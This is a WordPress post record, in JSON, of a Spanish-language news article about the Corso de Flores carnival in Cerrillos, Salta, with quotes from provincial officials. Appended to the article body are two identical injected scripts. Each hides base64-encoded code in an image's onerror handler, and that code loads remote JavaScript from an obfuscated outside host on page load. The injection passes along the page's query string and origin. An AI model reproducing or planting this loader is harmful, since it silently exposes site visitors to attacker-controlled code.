{"id":4839,"date":"2025-02-17T16:59:13","date_gmt":"2025-02-17T19:59:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4839"},"modified":"2025-08-13T23:40:36","modified_gmt":"2025-08-14T02:40:36","slug":"el-corso-de-flores-de-cerrillos-sigue-brillando-como-referente-turistico-y-cultural-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4839","title":{"rendered":"El Corso de Flores de Cerrillos sigue brillando como referente tur\u00edstico y cultural de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5d3bc6f47ca574d6773722c95db7c067\" style=\"background-color:#045b8e\"><em>Cada a\u00f1o, miles de visitantes se acercan a Cerrillos para ser parte de una fiesta vibrante que combina color, m\u00fasica, danzas y la calidez de la gente salte\u00f1a. El Corso destaca por por el impulso que brinda al turismo local, transform\u00e1ndose en un referente de la celebraci\u00f3n popular y el encuentro entre culturas.<\/em><\/h4>\n\n\n\n<p>La 119\u00b0 edici\u00f3n del Corso de Flores sigue desplegando su magia en el cors\u00f3dromo \u201cMart\u00edn Miguel de G\u00fcemes\u201d de Cerrillos, reafirmando su importancia como una de las festividades m\u00e1s emblem\u00e1ticas de la provincia. Con su colorido y tradici\u00f3n, este evento no solo fortalece la identidad cultural salte\u00f1a, sino que tambi\u00e9n impulsa el turismo y la econom\u00eda local.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16077-el-corso-de-flores-de-cerrillos-sigue-brillando-como-referente-turistico-y-cultural-de-salta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16077-el-corso-de-flores-de-cerrillos-sigue-brillando-como-referente-turistico-y-cultural-de-salta.webp\" alt=\"El Corso de Flores de Cerrillos sigue brillando como referente tur\u00edstico y cultural de Salta\"\/><\/a><\/figure>\n\n\n\n<p>La ministra de Turismo y Deportes de la Provincia, Manuela Arancibia, quien acompa\u00f1\u00f3 este fin de semana a los vecinos de Cerrillos y a su intendente Enrique Borelli en el Corso de Flores, destac\u00f3 la relevancia de estos eventos para el desarrollo de los destinos tur\u00edsticos en cada municipio.<\/p>\n\n\n\n<p>\u201cLos corsos son una expresi\u00f3n cultural fundamental para Salta, y el Corso de Flores, por su historia y convocatoria, es un gran atractivo para quienes visitan nuestra provincia. Desde el Gobierno de Salta trabajamos con cada municipio para potenciar estos encuentros, que adem\u00e1s generan un importante movimiento tur\u00edstico y econ\u00f3mico en las comunidades\u201d, expres\u00f3 la funcionaria.<\/p>\n\n\n\n<p>Por su parte el intendente Enrique Borelli resalt\u00f3 la identidad y el esfuerzo de la comunidad para mantener viva esta celebraci\u00f3n afirmando que \u201cser la Capital Provincial del Carnaval es un orgullo para todos los cerrillanos; el Corso de Flores es parte de nuestra historia y cada a\u00f1o logramos que sea una experiencia \u00fanica para vecinos y visitantes. Agradecemos el apoyo del Gobierno de la Provincia para seguir haciendo crecer esta tradici\u00f3n\u201d.<\/p>\n\n\n\n<p>En tanto, el senador del departamento, Gonzalo Caro subray\u00f3 la importancia de fortalecer estos eventos en toda la provincia. \u201cLas festividades populares, como este corso centenario, no solo son un pilar de nuestra cultura, sino tambi\u00e9n una gran oportunidad para el turismo.<br><br>Es clave seguir trabajando de manera articulada entre los municipios y el Gobierno provincial para seguir potenciando estos espacios de encuentro y desarrollo\u201d, se\u00f1al\u00f3 el legislador.<\/p>\n\n\n\n<p>El Corso de Flores de Cerrillos, el m\u00e1s antiguo de la provincia, seguir\u00e1 brillando durante cuatro s\u00e1bados m\u00e1s, con la participaci\u00f3n de comparsas, caretones, batucadas, tinkus, caporales y murgas humor\u00edsticas.<\/p>\n\n\n\n<p>Desde el Gobierno de Salta, se reafirma el compromiso de trabajar junto a todos los municipios para fortalecer las expresiones culturales que enriquecen la identidad provincial y generan oportunidades para el turismo en cada regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16078-el-corso-de-flores-de-cerrillos-sigue-brillando-como-referente-turistico-y-cultural-de-salta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16078-el-corso-de-flores-de-cerrillos-sigue-brillando-como-referente-turistico-y-cultural-de-salta.webp\" alt=\"El Corso de Flores de Cerrillos sigue brillando como referente tur\u00edstico y cultural de Salta\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Cada a\u00f1o, miles de visitantes se acercan a Cerrillos para ser parte de una fiesta vibrante que combina color, m\u00fasica, danzas y la calidez de la gente salte\u00f1a. El Corso destaca por por el impulso que brinda al turismo local, transform\u00e1ndose en un referente de la celebraci\u00f3n popular y el encuentro entre culturas. La 119\u00b0 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4840,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4839","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4839"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4839"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4839\/revisions"}],"predecessor-version":[{"id":6571,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4839\/revisions\/6571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4840"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}